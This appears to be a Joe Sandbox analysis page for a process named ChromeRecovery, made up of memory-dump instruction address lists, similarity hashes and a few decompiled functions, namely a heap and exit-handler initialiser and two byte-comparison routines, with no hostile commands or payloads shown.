0x00c87c98
0x00c87c9b
0x00c87ca1
0x00c87ca3
0x00c87ca6
0x00c87ca9
0x00c87cf7
0x00c87cf7
0x00c87cfa
0x00c87d0a
0x00c87d10
0x00c87d15
0x00c87d1a
0x00c87d1d
0x00c87d1f
0x00c87d69
0x00c87d69
0x00c87d6c
0x00c87dd0
0x00c87dd0
0x00c87de0
0x00c87de5
0x00c87de5
0x00c87de7
0x00c87e28
0x00000000
0x00c87e28
0x00c87dec
0x00c87def
0x00c87df1
0x00000000
0x00000000
0x00c87df3
0x00c87df6
0x00c87df9
0x00c87dfc
0x00c87dfe
0x00000000
0x00000000
0x00000000
0x00000000
0x00c87e00
0x00c87e00
0x00c87e06
0x00c87e0b
0x00c87e0d
0x00000000
0x00000000
0x00c87e0f
0x00c87e14
0x00c87e16
0x00c87e19
0x00000000
0x00000000
0x00c87e1b
0x00c87e1e
0x00c87e1f
0x00c87e21
0x00000000
0x00000000
0x00000000
0x00c87e23
0x00c87e25
0x00c87e25
0x00000000
0x00c87e25
0x00c87d6e
0x00c87d71
0x00000000
0x00000000
0x00c87d73
0x00c87d76
0x00c87d79
0x00c87d88
0x00c87d8f
0x00c87d93
0x00c87d98
0x00c87d9b
0x00c87d9d
0x00000000
0x00000000
0x00c87d9f
0x00c87da2
0x00000000
0x00000000
0x00c87da4
0x00c87db5
0x00c87dbd
0x00c87dc0
0x00c87dc1
0x00c87dc4
0x00c87dc7
0x00000000
0x00000000
0x00000000
0x00c87dc9
0x00c87dcb
0x00000000
0x00c87dcb
0x00c87d21
0x00c87d24
0x00c87d27
0x00000000
0x00000000
0x00c87d29
0x00c87d2c
0x00c87d2f
0x00c87d32
0x00c87d35
0x00000000
0x00000000
0x00000000
0x00000000
0x00c87d37
0x00c87d37
0x00c87d40
0x00c87d45
0x00c87d47
0x00000000
0x00000000
0x00c87d49
0x00c87d4e
0x00c87d50
0x00c87d53
0x00000000
0x00000000
0x00c87d58
0x00c87d59
0x00c87d5c
0x00c87d5f
0x00c87d62
0x00000000
0x00000000
0x00000000
0x00c87d64
0x00c87d66
0x00c87d66
0x00000000
0x00c87d66
0x00c87cab
0x00c87cae
0x00c87cb1
0x00c87cb4
0x00c87cb6
0x00000000
0x00000000
0x00c87cb8
0x00c87cbb
0x00c87cc1
0x00c87cc6
0x00c87ccb
0x00c87ccd
0x00000000
0x00000000
0x00c87ccf
0x00c87cd5
0x00c87cd8
0x00c87cdb
0x00000000
0x00000000
0x00c87ce0
0x00c87ce3
0x00c87ce4
0x00c87ce7
0x00c87ce9
0x00c87cef
0x00000000
0x00000000
0x00000000
0x00c87cf1
0x00c87cf3
0x00c87cf3
0x00c87cf3
0x00000000
0x00c87cf3
0x00c87c85
0x00c87c88
0x00000000
0x00000000
0x00000000
0x00c87c8a
0x00c87c77
0x00c87c79
0x00000000
0x00000000
0x00000000
0x00c87c79
0x00c87c6a
0x00c87c6c
0x00c87c6f
0x00000000
0x00000000
0x00000000
0x00c87c6f
0x00c87c63
0x00000000
0x00c87c63
0x00c87c53
0x00c87c56
0x00000000
0x00000000
0x00000000
0x00c87c56
0x00c87c1e
0x00c87c21
0x00c87c23
0x00c87c2b
0x00c87c2d
0x00c87c3c
0x00c87c3e
0x00c87c40
0x00c87c42
0x00c87c46
0x00c87c48
0x00c87c48
0x00000000
0x00c87c40
0x00c87c2f
0x00c87c33
0x00c87c33
0x00c87c35
0x00000000
0x00c87c35
0x00c87c25
0x00000000
0x00c87c25
0x00c87b51
0x00000000
0x00c87b51
0x00c87be3
0x00c87be3
0x00c87be6
0x00c87bb7
0x00c87bba
0x00000000
0x00c87bba
0x00c87be8
0x00c87beb
0x00000000
0x00000000
0x00c87bf1
0x00c87b5a
0x00c87b5c
0x00000000
0x00c87b5c
0x00c87b8b
0x00c87bcf
0x00000000
0x00c87bcf
0x00c87b8d
0x00c87b90
0x00c87bc1
0x00c87bc3
0x00000000
0x00c87bc3
0x00c87b92
0x00c87b95
0x00c87bb3
0x00c87bb3
0x00c87bb3
0x00c87bb3
0x00000000
0x00c87bb3
0x00c87b97
0x00c87b9a
0x00c87bac
0x00000000
0x00c87bac
0x00c87b9c
0x00c87b9f
0x00000000
0x00000000
0x00c87ba3
0x00000000
0x00c87ba3
0x00c87b15
0x00000000
0x00000000
0x00c87b1b
0x00c87b1d
0x00c87b63
0x00c87b63
0x00c87b66
0x00c87b7f
0x00000000
0x00c87b7f
0x00c87b68
0x00c87b68
0x00c87b6b
0x00000000
0x00000000
0x00c87b6e
0x00c87b71
0x00000000
0x00000000
0x00c87b73
0x00c87b76
0x00000000
0x00c87b76
0x00c87b1f
0x00c87b58
0x00000000
0x00c87b58
0x00c87b24
0x00000000
0x00000000
0x00c87b2d
0x00000000
0x00000000
0x00c87b32
0x00000000
0x00000000
0x00c87b37
0x00000000
0x00000000
0x00c87b40
0x00000000
0x00000000
0x00000000

Strings

0, xrefs: 00C87C7B

Memory Dump Source

Source File: 0000001B.00000002.445759701.0000000000C71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00C70000, based on PE: true

Associated: 0000001B.00000002.445754141.0000000000C70000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445790129.0000000000C97000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445803577.0000000000CA8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445807460.0000000000CAB000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_c70000_ChromeRecovery.jbxd

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 100d770690aad1ee8b932fe6d2a4c4ea1d4856624948bf662ff4b125ec735a1e
Instruction ID: dc857b69d025781544e3304391e530455cc6c4f65e54af386b48f163b5932101
Opcode Fuzzy Hash: 100d770690aad1ee8b932fe6d2a4c4ea1d4856624948bf662ff4b125ec735a1e
Instruction Fuzzy Hash: 26B1E570908A0A8BCB34EF68C4956BEB7A2AF4530CF34071ED462A7691E730DE45DB5D

Uniqueness

Uniqueness Score: -1.00%

Function 00C713D8 Relevance: 1.3, APIs: 1, Instructions: 35
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00C713D8() {
				signed int _t4;
				void* _t9;
				signed int _t11;

				_t4 =  *0xca9b74; // 0x3
				if((_t4 & 0x00000001) == 0) {
					_t8 = _t4 | 0x00000001;
					 *0xca9b74 = _t4 | 0x00000001;
					_t9 = GetProcessHeap();
					 *0xca9b78 = 0xca25bc;
					 *0xca9b7c = _t9;
					 *0xca9b80 = 0;
					E00C7F618(_t8, E00C96505);
					_t4 =  *0xca9b74; // 0x3
				}
				if((_t4 & 0x00000002) == 0) {
					 *0xca9b94 =  *0xca9b94 & 0x00000000;
					 *0xca9b98 =  *0xca9b98 & 0x00000000;
					_t11 = 2;
					 *0xca9b9c = _t11;
					 *0xca9b74 = _t4 | _t11;
					 *0xca9b88 = 0xca35b0;
					 *0xca9b8c = 0xca9b78;
					 *0xca9ba0 = 0;
					 *0xca9b90 = 0xca9b88;
					E00C7F618(0, 0xc96504);
				}
				return 0xca9b88;
			}

0x00c713d8
0x00c713df
0x00c713e1
0x00c713e4
0x00c713e9
0x00c713f4
0x00c713fe
0x00c71403
0x00c7140a
0x00c7140f
0x00c71414
0x00c7141d
0x00c7141f
0x00c71426
0x00c7142f
0x00c71432
0x00c7143a
0x00c71444
0x00c7144e
0x00c71458
0x00c7145e
0x00c71464
0x00c71469
0x00c7146d

APIs

GetProcessHeap.KERNEL32 ref: 00C713E9

Part of subcall function 00C7F618: __onexit.LIBCMT ref: 00C7F61E

Memory Dump Source

Source File: 0000001B.00000002.445759701.0000000000C71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00C70000, based on PE: true

Associated: 0000001B.00000002.445754141.0000000000C70000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445790129.0000000000C97000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445803577.0000000000CA8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445807460.0000000000CAB000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_c70000_ChromeRecovery.jbxd

Similarity

API ID: HeapProcess__onexit
String ID:
API String ID: 2210869276-0
Opcode ID: 3ae42bda5ea00711f4285b34569a6928a161eaafffe644a00eb2f9222724ab0d
Instruction ID: b289c0ba883293cc1e4a26bc3f4e640c0bb9d61616c59f4f10a491eed839a3f2
Opcode Fuzzy Hash: 3ae42bda5ea00711f4285b34569a6928a161eaafffe644a00eb2f9222724ab0d
Instruction Fuzzy Hash: B401C9B19162108FDB348F6CBD4B79D3BA1F30B76EF10962EE4099B2A0D77084059F64

Uniqueness

Uniqueness Score: -1.00%

Function 00C956B9 Relevance: .6, Instructions: 637COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.445759701.0000000000C71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00C70000, based on PE: true

Associated: 0000001B.00000002.445754141.0000000000C70000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445790129.0000000000C97000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445803577.0000000000CA8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445807460.0000000000CAB000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_c70000_ChromeRecovery.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 704b656ab8e99ec61037b05989987012b2647fb4dbb1376148846505f482c64c
Instruction ID: 5810ab018c68ca998f2a30be531f25b374da7dbf87dfa5b87e043bdf5576e25f
Opcode Fuzzy Hash: 704b656ab8e99ec61037b05989987012b2647fb4dbb1376148846505f482c64c
Instruction Fuzzy Hash: 3F321932D29F414DDB239634C9693396288AFB73C4F15D737F82AB5DAAEB29C5834100

Uniqueness

Uniqueness Score: -1.00%

Function 00C947AC Relevance: .3, Instructions: 254
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E00C947AC(void* __edx, void* __esi) {
				signed int _t136;
				signed char _t137;
				signed char _t138;
				signed char _t139;
				signed char _t140;
				signed char _t142;
				signed int _t185;
				void* _t207;
				void* _t212;
				void* _t216;
				void* _t220;
				void* _t224;
				void* _t228;
				void* _t232;
				void* _t235;

				_t235 = __esi;
				_t207 = __edx;
				if( *((intOrPtr*)(__esi - 0x1e)) ==  *((intOrPtr*)(__edx - 0x1e))) {
					_t185 = 0;
					goto L12;
				} else {
					__edi = __al & 0x000000ff;
					__edi = (__al & 0x000000ff) - ( *(__edx - 0x1e) & 0x000000ff);
					if(__edi != 0) {
						L8:
						0 = 0 | __edi > 0x00000000;
						__ecx = (__edi > 0) * 2 - 1;
						L12:
						if(_t185 != 0) {
							L2:
							_t136 = _t185;
							return _t136;
						}
						_t137 =  *(_t235 - 0x1a);
						if(_t137 ==  *(_t207 - 0x1a)) {
							_t185 = 0;
							L21:
							if(_t185 != 0) {
								goto L2;
							}
							_t138 =  *(_t235 - 0x16);
							if(_t138 ==  *(_t207 - 0x16)) {
								_t185 = 0;
								L30:
								if(_t185 != 0) {
									goto L2;
								}
								_t139 =  *(_t235 - 0x12);
								if(_t139 ==  *(_t207 - 0x12)) {
									_t185 = 0;
									L39:
									if(_t185 != 0) {
										goto L2;
									}
									_t140 =  *(_t235 - 0xe);
									if(_t140 ==  *(_t207 - 0xe)) {
										_t185 = 0;
										L48:
										if(_t185 != 0) {
											goto L2;
										}
										if( *(_t235 - 0xa) ==  *(_t207 - 0xa)) {
											_t185 = 0;
											L57:
											if(_t185 != 0) {
												goto L2;
											}
											_t142 =  *(_t235 - 6);
											if(_t142 ==  *(_t207 - 6)) {
												_t185 = 0;
												L66:
												if(_t185 == 0 &&  *((intOrPtr*)(_t235 - 2)) ==  *((intOrPtr*)(_t207 - 2))) {
												}
												goto L2;
											}
											_t212 = (_t142 & 0x000000ff) - ( *(_t207 - 6) & 0x000000ff);
											if(_t212 != 0) {
												L62:
												_t185 = (0 | _t212 > 0x00000000) * 2 - 1;
												goto L66;
											}
											_t212 = ( *(_t235 - 5) & 0x000000ff) - ( *(_t207 - 5) & 0x000000ff);
											if(_t212 != 0) {
												goto L62;
											}
											_t212 = ( *(_t235 - 4) & 0x000000ff) - ( *(_t207 - 4) & 0x000000ff);
											if(_t212 == 0) {
												_t185 = ( *(_t235 - 3) & 0x000000ff) - ( *(_t207 - 3) & 0x000000ff);
												if(_t185 != 0) {
													_t185 = (0 | _t185 > 0x00000000) * 2 - 1;
												}
												goto L66;
											}
											goto L62;
										}
										_t216 = ( *(_t235 - 0xa) & 0x000000ff) - ( *(_t207 - 0xa) & 0x000000ff);
										if(_t216 != 0) {
											L53:
											_t185 = (0 | _t216 > 0x00000000) * 2 - 1;
											goto L57;
										}
										_t216 = ( *(_t235 - 9) & 0x000000ff) - ( *(_t207 - 9) & 0x000000ff);
										if(_t216 != 0) {
											goto L53;
										}
										_t216 = ( *(_t235 - 8) & 0x000000ff) - ( *(_t207 - 8) & 0x000000ff);
										if(_t216 == 0) {
											_t185 = ( *(_t235 - 7) & 0x000000ff) - ( *(_t207 - 7) & 0x000000ff);
											if(_t185 != 0) {
												_t185 = (0 | _t185 > 0x00000000) * 2 - 1;
											}
											goto L57;
										}
										goto L53;
									}
									_t220 = (_t140 & 0x000000ff) - ( *(_t207 - 0xe) & 0x000000ff);
									if(_t220 != 0) {
										L44:
										_t185 = (0 | _t220 > 0x00000000) * 2 - 1;
										goto L48;
									}
									_t220 = ( *(_t235 - 0xd) & 0x000000ff) - ( *(_t207 - 0xd) & 0x000000ff);
									if(_t220 != 0) {
										goto L44;
									}
									_t220 = ( *(_t235 - 0xc) & 0x000000ff) - ( *(_t207 - 0xc) & 0x000000ff);
									if(_t220 == 0) {
										_t185 = ( *(_t235 - 0xb) & 0x000000ff) - ( *(_t207 - 0xb) & 0x000000ff);
										if(_t185 != 0) {
											_t185 = (0 | _t185 > 0x00000000) * 2 - 1;
										}
										goto L48;
									}
									goto L44;
								}
								_t224 = (_t139 & 0x000000ff) - ( *(_t207 - 0x12) & 0x000000ff);
								if(_t224 != 0) {
									L35:
									_t185 = (0 | _t224 > 0x00000000) * 2 - 1;
									goto L39;
								}
								_t224 = ( *(_t235 - 0x11) & 0x000000ff) - ( *(_t207 - 0x11) & 0x000000ff);
								if(_t224 != 0) {
									goto L35;
								}
								_t224 = ( *(_t235 - 0x10) & 0x000000ff) - ( *(_t207 - 0x10) & 0x000000ff);
								if(_t224 == 0) {
									_t185 = ( *(_t235 - 0xf) & 0x000000ff) - ( *(_t207 - 0xf) & 0x000000ff);
									if(_t185 != 0) {
										_t185 = (0 | _t185 > 0x00000000) * 2 - 1;
									}
									goto L39;
								}
								goto L35;
							}
							_t228 = (_t138 & 0x000000ff) - ( *(_t207 - 0x16) & 0x000000ff);
							if(_t228 != 0) {
								L26:
								_t185 = (0 | _t228 > 0x00000000) * 2 - 1;
								goto L30;
							}
							_t228 = ( *(_t235 - 0x15) & 0x000000ff) - ( *(_t207 - 0x15) & 0x000000ff);
							if(_t228 != 0) {
								goto L26;
							}
							_t228 = ( *(_t235 - 0x14) & 0x000000ff) - ( *(_t207 - 0x14) & 0x000000ff);
							if(_t228 == 0) {
								_t185 = ( *(_t235 - 0x13) & 0x000000ff) - ( *(_t207 - 0x13) & 0x000000ff);
								if(_t185 != 0) {
									_t185 = (0 | _t185 > 0x00000000) * 2 - 1;
								}
								goto L30;
							}
							goto L26;
						}
						_t232 = (_t137 & 0x000000ff) - ( *(_t207 - 0x1a) & 0x000000ff);
						if(_t232 != 0) {
							L17:
							_t185 = (0 | _t232 > 0x00000000) * 2 - 1;
							goto L21;
						}
						_t232 = ( *(_t235 - 0x19) & 0x000000ff) - ( *(_t207 - 0x19) & 0x000000ff);
						if(_t232 != 0) {
							goto L17;
						}
						_t232 = ( *(_t235 - 0x18) & 0x000000ff) - ( *(_t207 - 0x18) & 0x000000ff);
						if(_t232 == 0) {
							_t185 = ( *(_t235 - 0x17) & 0x000000ff) - ( *(_t207 - 0x17) & 0x000000ff);
							if(_t185 != 0) {
								_t185 = (0 | _t185 > 0x00000000) * 2 - 1;
							}
							goto L21;
						}
						goto L17;
					}
					__edi =  *(__esi - 0x1d) & 0x000000ff;
					__edi = ( *(__esi - 0x1d) & 0x000000ff) - ( *(__edx - 0x1d) & 0x000000ff);
					if(__edi != 0) {
						goto L8;
					}
					__edi =  *(__esi - 0x1c) & 0x000000ff;
					__edi = ( *(__esi - 0x1c) & 0x000000ff) - ( *(__edx - 0x1c) & 0x000000ff);
					if(__edi == 0) {
						__ecx =  *(__esi - 0x1b) & 0x000000ff;
						__ecx = ( *(__esi - 0x1b) & 0x000000ff) - ( *(__edx - 0x1b) & 0x000000ff);
						if(__ecx != 0) {
							__ecx = (0 | __ecx > 0x00000000) * 2 - 1;
						}
						goto L12;
					}
					goto L8;
				}
			}

0x00c947ac
0x00c947ac
0x00c947b2
0x00c94803
0x00000000
0x00c947b4
0x00c947b4
0x00c947bb
0x00c947bd
0x00c947d7
0x00c947db
0x00c947de
0x00c94805
0x00c94807
0x00c944dd
0x00c944dd
0x00c94deb
0x00c94deb
0x00c9480d
0x00c94813
0x00c94864
0x00c94866
0x00c94868
0x00000000
0x00000000
0x00c9486e
0x00c94874
0x00c948c5
0x00c948c7
0x00c948c9
0x00000000
0x00000000
0x00c948cf
0x00c948d5
0x00c94926
0x00c94928
0x00c9492a
0x00000000
0x00000000
0x00c94930
0x00c94936
0x00c94987
0x00c94989
0x00c9498b
0x00000000
0x00000000
0x00c94997
0x00c949e9
0x00c949eb
0x00c949ed
0x00000000
0x00000000
0x00c949f3
0x00c949f9
0x00c94a4a
0x00c94a4c
0x00c94a4e
0x00c94a4e
0x00000000
0x00c94a4e
0x00c94a02
0x00c94a04
0x00c94a1e
0x00c94a25
0x00000000
0x00c94a25
0x00c94a0e
0x00c94a10
0x00000000
0x00000000
0x00c94a1a
0x00c94a1c
0x00c94a36
0x00c94a38
0x00c94a41
0x00c94a41
0x00000000
0x00c94a38
0x00000000
0x00c94a1c
0x00c949a1
0x00c949a3
0x00c949bd
0x00c949c4
0x00000000
0x00c949c4
0x00c949ad
0x00c949af
0x00000000
0x00000000
0x00c949b9
0x00c949bb
0x00c949d5
0x00c949d7
0x00c949e0
0x00c949e0
0x00000000
0x00c949d7
0x00000000
0x00c949bb
0x00c9493f
0x00c94941
0x00c9495b
0x00c94962
0x00000000
0x00c94962
0x00c9494b
0x00c9494d
0x00000000
0x00000000
0x00c94957
0x00c94959
0x00c94973
0x00c94975
0x00c9497e
0x00c9497e
0x00000000
0x00c94975
0x00000000
0x00c94959
0x00c948de
0x00c948e0
0x00c948fa
0x00c94901
0x00000000
0x00c94901
0x00c948ea
0x00c948ec
0x00000000
0x00000000
0x00c948f6
0x00c948f8
0x00c94912
0x00c94914
0x00c9491d
0x00c9491d
0x00000000
0x00c94914
0x00000000
0x00c948f8
0x00c9487d
0x00c9487f
0x00c94899
0x00c948a0
0x00000000
0x00c948a0
0x00c94889
0x00c9488b
0x00000000
0x00000000
0x00c94895
0x00c94897
0x00c948b1
0x00c948b3
0x00c948bc
0x00c948bc
0x00000000
0x00c948b3
0x00000000
0x00c94897
0x00c9481c
0x00c9481e
0x00c94838
0x00c9483f
0x00000000
0x00c9483f
0x00c94828
0x00c9482a
0x00000000
0x00000000
0x00c94834
0x00c94836
0x00c94850
0x00c94852
0x00c9485b
0x00c9485b
0x00000000
0x00c94852
0x00000000
0x00c94836
0x00c947bf
0x00c947c7
0x00c947c9
0x00000000
0x00000000
0x00c947cb
0x00c947d3
0x00c947d5
0x00c947e7
0x00c947ef
0x00c947f1
0x00c947fa
0x00c947fa
0x00000000
0x00c947f1
0x00000000
0x00c947d5

Memory Dump Source

Source File: 0000001B.00000002.445759701.0000000000C71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00C70000, based on PE: true

Associated: 0000001B.00000002.445754141.0000000000C70000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445790129.0000000000C97000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445803577.0000000000CA8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445807460.0000000000CAB000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_c70000_ChromeRecovery.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
Instruction ID: b59a40f48b5d7231e383b071371afca9a6706c297777c74251adda5753ef9e88
Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
Instruction Fuzzy Hash: 0C9153722080E349DF6D463A847C93EFFE55B523A231A079DD4F2CA1C5EE249666E620

Uniqueness

Uniqueness Score: -1.00%

Function 00C94A67 Relevance: .2, Instructions: 244
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E00C94A67(void* __edx, void* __esi) {
				signed int _t137;
				signed char _t138;
				signed char _t139;
				signed char _t140;
				signed char _t142;
				signed char _t143;
				signed int _t186;
				void* _t208;
				void* _t211;
				void* _t214;
				void* _t218;
				void* _t222;
				void* _t226;
				void* _t230;
				void* _t234;
				void* _t237;

				_t237 = __esi;
				_t208 = __edx;
				if( *((intOrPtr*)(__esi - 0x1f)) ==  *((intOrPtr*)(__edx - 0x1f))) {
					_t186 = 0;
					goto L11;
				} else {
					__edi =  *(__esi - 0x1f) & 0x000000ff;
					__edi = ( *(__esi - 0x1f) & 0x000000ff) - ( *(__edx - 0x1f) & 0x000000ff);
					if(__edi != 0) {
						L7:
						0 = 0 | __edi > 0x00000000;
						__ecx = (__edi > 0) * 2 - 1;
						L11:
						if(_t186 != 0) {
							goto L1;
						}
						_t138 =  *(_t237 - 0x1b);
						if(_t138 ==  *(_t208 - 0x1b)) {
							_t186 = 0;
							L20:
							if(_t186 != 0) {
								goto L1;
							}
							_t139 =  *(_t237 - 0x17);
							if(_t139 ==  *(_t208 - 0x17)) {
								_t186 = 0;
								L29:
								if(_t186 != 0) {
									goto L1;
								}
								_t140 =  *(_t237 - 0x13);
								if(_t140 ==  *(_t208 - 0x13)) {
									_t186 = 0;
									L38:
									if(_t186 != 0) {
										goto L1;
									}
									if( *(_t237 - 0xf) ==  *(_t208 - 0xf)) {
										_t186 = 0;
										L47:
										if(_t186 != 0) {
											goto L1;
										}
										_t142 =  *(_t237 - 0xb);
										if(_t142 ==  *(_t208 - 0xb)) {
											_t186 = 0;
											L56:
											if(_t186 != 0) {
												goto L1;
											}
											_t143 =  *(_t237 - 7);
											if(_t143 ==  *(_t208 - 7)) {
												_t186 = 0;
												L65:
												if(_t186 != 0) {
													goto L1;
												}
												_t211 = ( *(_t237 - 3) & 0x000000ff) - ( *(_t208 - 3) & 0x000000ff);
												if(_t211 != 0) {
													L68:
													_t186 = (0 | _t211 > 0x00000000) * 2 - 1;
													goto L1;
												}
												_t211 = ( *(_t237 - 2) & 0x000000ff) - ( *(_t208 - 2) & 0x000000ff);
												if(_t211 == 0) {
													_t186 = ( *(_t237 - 1) & 0x000000ff) - ( *(_t208 - 1) & 0x000000ff);
													if(_t186 != 0) {
														_t186 = (0 | _t186 > 0x00000000) * 2 - 1;
													}
													goto L1;
												}
												goto L68;
											}
											_t214 = (_t143 & 0x000000ff) - ( *(_t208 - 7) & 0x000000ff);
											if(_t214 != 0) {
												L61:
												_t186 = (0 | _t214 > 0x00000000) * 2 - 1;
												goto L65;
											}
											_t214 = ( *(_t237 - 6) & 0x000000ff) - ( *(_t208 - 6) & 0x000000ff);
											if(_t214 != 0) {
												goto L61;
											}
											_t214 = ( *(_t237 - 5) & 0x000000ff) - ( *(_t208 - 5) & 0x000000ff);
											if(_t214 == 0) {
												_t186 = ( *(_t237 - 4) & 0x000000ff) - ( *(_t208 - 4) & 0x000000ff);
												if(_t186 != 0) {
													_t186 = (0 | _t186 > 0x00000000) * 2 - 1;
												}
												goto L65;
											}
											goto L61;
										}
										_t218 = (_t142 & 0x000000ff) - ( *(_t208 - 0xb) & 0x000000ff);
										if(_t218 != 0) {
											L52:
											_t186 = (0 | _t218 > 0x00000000) * 2 - 1;
											goto L56;
										}
										_t218 = ( *(_t237 - 0xa) & 0x000000ff) - ( *(_t208 - 0xa) & 0x000000ff);
										if(_t218 != 0) {
											goto L52;
										}
										_t218 = ( *(_t237 - 9) & 0x000000ff) - ( *(_t208 - 9) & 0x000000ff);
										if(_t218 == 0) {
											_t186 = ( *(_t237 - 8) & 0x000000ff) - ( *(_t208 - 8) & 0x000000ff);
											if(_t186 != 0) {
												_t186 = (0 | _t186 > 0x00000000) * 2 - 1;
											}
											goto L56;
										}
										goto L52;
									}
									_t222 = ( *(_t237 - 0xf) & 0x000000ff) - ( *(_t208 - 0xf) & 0x000000ff);
									if(_t222 != 0) {
										L43:
										_t186 = (0 | _t222 > 0x00000000) * 2 - 1;
										goto L47;
									}
									_t222 = ( *(_t237 - 0xe) & 0x000000ff) - ( *(_t208 - 0xe) & 0x000000ff);
									if(_t222 != 0) {
										goto L43;
									}
									_t222 = ( *(_t237 - 0xd) & 0x000000ff) - ( *(_t208 - 0xd) & 0x000000ff);
									if(_t222 == 0) {
										_t186 = ( *(_t237 - 0xc) & 0x000000ff) - ( *(_t208 - 0xc) & 0x000000ff);
										if(_t186 != 0) {
											_t186 = (0 | _t186 > 0x00000000) * 2 - 1;
										}
										goto L47;
									}
									goto L43;
								}
								_t226 = (_t140 & 0x000000ff) - ( *(_t208 - 0x13) & 0x000000ff);
								if(_t226 != 0) {
									L34:
									_t186 = (0 | _t226 > 0x00000000) * 2 - 1;
									goto L38;
								}
								_t226 = ( *(_t237 - 0x12) & 0x000000ff) - ( *(_t208 - 0x12) & 0x000000ff);
								if(_t226 != 0) {
									goto L34;
								}
								_t226 = ( *(_t237 - 0x11) & 0x000000ff) - ( *(_t208 - 0x11) & 0x000000ff);
								if(_t226 == 0) {
									_t186 = ( *(_t237 - 0x10) & 0x000000ff) - ( *(_t208 - 0x10) & 0x000000ff);
									if(_t186 != 0) {
										_t186 = (0 | _t186 > 0x00000000) * 2 - 1;
									}
									goto L38;
								}
								goto L34;
							}
							_t230 = (_t139 & 0x000000ff) - ( *(_t208 - 0x17) & 0x000000ff);
							if(_t230 != 0) {
								L25:
								_t186 = (0 | _t230 > 0x00000000) * 2 - 1;
								goto L29;
							}
							_t230 = ( *(_t237 - 0x16) & 0x000000ff) - ( *(_t208 - 0x16) & 0x000000ff);
							if(_t230 != 0) {
								goto L25;
							}
							_t230 = ( *(_t237 - 0x15) & 0x000000ff) - ( *(_t208 - 0x15) & 0x000000ff);
							if(_t230 == 0) {
								_t186 = ( *(_t237 - 0x14) & 0x000000ff) - ( *(_t208 - 0x14) & 0x000000ff);
								if(_t186 != 0) {
									_t186 = (0 | _t186 > 0x00000000) * 2 - 1;
								}
								goto L29;
							}
							goto L25;
						}
						_t234 = (_t138 & 0x000000ff) - ( *(_t208 - 0x1b) & 0x000000ff);
						if(_t234 != 0) {
							L16:
							_t186 = (0 | _t234 > 0x00000000) * 2 - 1;
							goto L20;
						}
						_t234 = ( *(_t237 - 0x1a) & 0x000000ff) - ( *(_t208 - 0x1a) & 0x000000ff);
						if(_t234 != 0) {
							goto L16;
						}
						_t234 = ( *(_t237 - 0x19) & 0x000000ff) - ( *(_t208 - 0x19) & 0x000000ff);
						if(_t234 == 0) {
							_t186 = ( *(_t237 - 0x18) & 0x000000ff) - ( *(_t208 - 0x18) & 0x000000ff);
							if(_t186 != 0) {
								_t186 = (0 | _t186 > 0x00000000) * 2 - 1;
							}
							goto L20;
						}
						goto L16;
					}
					__edi =  *(__esi - 0x1e) & 0x000000ff;
					__edi = ( *(__esi - 0x1e) & 0x000000ff) - ( *(__edx - 0x1e) & 0x000000ff);
					if(__edi != 0) {
						goto L7;
					}
					__edi =  *(__esi - 0x1d) & 0x000000ff;
					__edi = ( *(__esi - 0x1d) & 0x000000ff) - ( *(__edx - 0x1d) & 0x000000ff);
					if(__edi == 0) {
						__ecx =  *(__esi - 0x1c) & 0x000000ff;
						__ecx = ( *(__esi - 0x1c) & 0x000000ff) - ( *(__edx - 0x1c) & 0x000000ff);
						if(__ecx != 0) {
							__ecx = (0 | __ecx > 0x00000000) * 2 - 1;
						}
						goto L11;
					}
					goto L7;
				}
				L1:
				_t137 = _t186;
				return _t137;
			}

0x00c94a67
0x00c94a67
0x00c94a6d
0x00c94abf
0x00000000
0x00c94a6f
0x00c94a73
0x00c94a77
0x00c94a79
0x00c94a93
0x00c94a97
0x00c94a9a
0x00c94ac1
0x00c94ac3
0x00000000
0x00000000
0x00c94ac9
0x00c94acf
0x00c94b20
0x00c94b22
0x00c94b24
0x00000000
0x00000000
0x00c94b2a
0x00c94b30
0x00c94b81
0x00c94b83
0x00c94b85
0x00000000
0x00000000
0x00c94b8b
0x00c94b91
0x00c94be2
0x00c94be4
0x00c94be6
0x00000000
0x00000000
0x00c94bf2
0x00c94c44
0x00c94c46
0x00c94c48
0x00000000
0x00000000
0x00c94c4e
0x00c94c54
0x00c94ca5
0x00c94ca7
0x00c94ca9
0x00000000
0x00000000
0x00c94caf
0x00c94cb5
0x00c94d06
0x00c94d08
0x00c94d0a
0x00000000
0x00000000
0x00c94d18
0x00c94d1a
0x00c94d2c
0x00c94d33
0x00000000
0x00c94d33
0x00c94d24
